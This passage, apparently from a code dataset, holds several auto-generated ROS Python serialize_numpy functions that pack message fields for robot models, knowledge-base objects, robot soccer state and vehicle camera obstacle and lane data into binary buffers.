in self.model_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs))\n _x = self.model_aligned.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model_aligned.track.id))\n length = len(self.model_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose:\n _v85 = val1.position\n _x = _v85\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v86 = val1.orientation\n _x = _v86\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = 
len(self.model_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v87 = val1.stamp\n _x = _v87\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_projected:\n _v88 = val1.position\n _x = _v88\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v89 = val1.orientation\n _x = _v89\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.pose_resampled:\n _v90 = val1.position\n _x = _v90\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v91 = val1.orientation\n _x = _v91\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(self.model_aligned.track.pose_flags.tostring())\n length = len(self.model_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs))\n _x = self.data_aligned.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data_aligned.id))\n _x = self.data_aligned.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs))\n _x = self.data_aligned.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data_aligned.track.id))\n length = len(self.data_aligned.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose:\n _v92 = val1.position\n _x = _v92\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v93 = val1.orientation\n _x = _v93\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v94 = val1.stamp\n _x = _v94\n 
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_aligned.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_projected:\n _v95 = val1.position\n _x = _v95\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v96 = val1.orientation\n _x = _v96\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.pose_resampled:\n _v97 = val1.position\n _x = _v97\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v98 = val1.orientation\n _x = _v98\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data_aligned.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(self.data_aligned.track.pose_flags.tostring())\n length = len(self.data_aligned.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_aligned.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n buff.write(self.R.tostring())\n buff.write(self.T.tostring())\n _x = self\n buff.write(_struct_df.pack(_x.dist_rot, _x.dist_trans))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.namespace\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.prefixes)\n buff.write(_struct_I.pack(length))\n for val1 in self.prefixes:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.prefix\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.imports)\n buff.write(_struct_I.pack(length))\n for val1 in self.imports:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val1))\n else:\n buff.write(struct.pack('<I%ss'%length, length, 
val1))\n _x = self.address.room_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.floor_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_nr\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.street_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.address.city_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v13 = val1.header\n buff.write(_struct_I.pack(_v13.seq))\n _v14 = _v13.stamp\n _x = _v14\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v13.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v15 = val1.size\n _x = _v15\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v16 = val1.pose\n _v17 = _v16.position\n _x = _v17\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v18 = _v16.orientation\n _x = _v18\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n _x = val1.part_of\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.actions)\n buff.write(_struct_I.pack(length))\n for val1 in self.actions:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.asserted))\n _x = val1.object_acted_on\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = 
_x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.subactions)\n buff.write(_struct_I.pack(length))\n for val2 in val1.subactions:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *val2))\n else:\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = val1\n buff.write(_struct_bB.pack(_x.quantification, _x.unordered))\n length = len(self.object_properties)\n buff.write(_struct_I.pack(length))\n for val1 in self.object_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data_properties)\n buff.write(_struct_I.pack(length))\n for val1 in self.data_properties:\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.subject\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_B.pack(val1.value_type))\n _x = val1.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs))\n _x = self.obstacleinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.obstacleinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.obstacleinfo.polar_pos)\n 
buff.write(_struct_I.pack(length))\n for val1 in self.obstacleinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _x = self\n buff.write(_get_struct_3I().pack(_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs))\n _x = self.oppinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.oppinfo.pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.oppinfo.polar_pos)\n buff.write(_struct_I.pack(length))\n for val1 in self.oppinfo.polar_pos:\n _x = val1\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n length = len(self.robotinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.robotinfo:\n _v23 = val1.header\n buff.write(_get_struct_I().pack(_v23.seq))\n _v24 = _v23.stamp\n _x = _v24\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v23.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_7i().pack(_x.AgentID, _x.targetNum1, _x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum))\n _v25 = val1.pos\n _x = _v25\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v26 = val1.heading\n buff.write(_get_struct_f().pack(_v26.theta))\n buff.write(_get_struct_f().pack(val1.vrot))\n _v27 = val1.vtrans\n _x = _v27\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_5Bf().pack(_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time))\n _v28 = val1.target\n _x = _v28\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n length = len(self.ballinfo)\n buff.write(_struct_I.pack(length))\n for val1 in self.ballinfo:\n _v29 = val1.header\n buff.write(_get_struct_I().pack(_v29.seq))\n _v30 = _v29.stamp\n _x = _v30\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v29.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.ballinfostate))\n _v31 = val1.pos\n _x = _v31\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _v32 = val1.real_pos\n _x = _v32\n buff.write(_get_struct_2f().pack(_x.angle, _x.radius))\n _v33 = val1.velocity\n _x = _v33\n buff.write(_get_struct_2f().pack(_x.x, _x.y))\n _x = val1\n buff.write(_get_struct_2B().pack(_x.pos_known, _x.velocity_known))\n _x = self\n buff.write(_get_struct_3I().pack(_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs))\n _x = self.coachinfo.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B2I4f4B().pack(_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, _x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, _x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, 
_x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.messageID, _x.localStamp.header.seq, _x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs))\n _x = self.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height))\n buff.write(self.localStamp.position.tostring())\n buff.write(self.localStamp.orientation.tostring())\n buff.write(self.localStamp.linearSpeed.tostring())\n buff.write(self.localStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs))\n _x = self.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height))\n buff.write(self.globalStamp.position.tostring())\n buff.write(self.globalStamp.orientation.tostring())\n buff.write(self.globalStamp.linearSpeed.tostring())\n buff.write(self.globalStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs))\n _x = self.camera.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs))\n _x = self.camera.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height))\n buff.write(self.camera.localStamp.position.tostring())\n buff.write(self.camera.localStamp.orientation.tostring())\n buff.write(self.camera.localStamp.linearSpeed.tostring())\n buff.write(self.camera.localStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, _x.camera.globalStamp.header.stamp.nsecs))\n _x = self.camera.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n 
buff.write(_get_struct_4d().pack(_x.camera.globalStamp.time, _x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height))\n buff.write(self.camera.globalStamp.position.tostring())\n buff.write(self.camera.globalStamp.orientation.tostring())\n buff.write(self.camera.globalStamp.linearSpeed.tostring())\n buff.write(self.camera.globalStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_id().pack(_x.camera.camera_numobstacles, _x.camera.VehSpeed))\n for val1 in self.camera_obj:\n _v17 = val1.header\n buff.write(_get_struct_I().pack(_v17.seq))\n _v18 = _v17.stamp\n _x = _v18\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v17.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.messageID))\n _v19 = val1.localStamp\n _v20 = _v19.header\n buff.write(_get_struct_I().pack(_v20.seq))\n _v21 = _v20.stamp\n _x = _v21\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v20.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v19\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_v19.position.tostring())\n buff.write(_v19.orientation.tostring())\n buff.write(_v19.linearSpeed.tostring())\n buff.write(_v19.angularSpeed.tostring())\n _v22 = val1.globalStamp\n _v23 = _v22.header\n buff.write(_get_struct_I().pack(_v23.seq))\n _v24 = _v23.stamp\n _x = _v24\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v23.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v22\n buff.write(_get_struct_4d().pack(_x.time, _x.lat, _x.lng, _x.height))\n buff.write(_v22.position.tostring())\n buff.write(_v22.orientation.tostring())\n buff.write(_v22.linearSpeed.tostring())\n buff.write(_v22.angularSpeed.tostring())\n _x = val1\n buff.write(_get_struct_i2d6i3d3i2d2ididid().pack(_x.camera_obstacle_id, _x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, _x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle))\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs))\n _x = self.camera_lane.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_i3I().pack(_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, _x.camera_lane.localStamp.header.stamp.nsecs))\n _x = self.camera_lane.localStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, 
_x.camera_lane.localStamp.height))\n buff.write(self.camera_lane.localStamp.position.tostring())\n buff.write(self.camera_lane.localStamp.orientation.tostring())\n buff.write(self.camera_lane.localStamp.linearSpeed.tostring())\n buff.write(self.camera_lane.localStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_3I().pack(_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs))\n _x = self.camera_lane.globalStamp.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_4d().pack(_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height))\n buff.write(self.camera_lane.globalStamp.position.tostring())\n buff.write(self.camera_lane.globalStamp.orientation.tostring())\n buff.write(self.camera_lane.globalStamp.linearSpeed.tostring())\n buff.write(self.camera_lane.globalStamp.angularSpeed.tostring())\n _x = self\n buff.write(_get_struct_2i3did19i3did21i3did7i3did7i4di().pack(_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, _x.camera_lane.l_laneQuality, _x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, _x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, 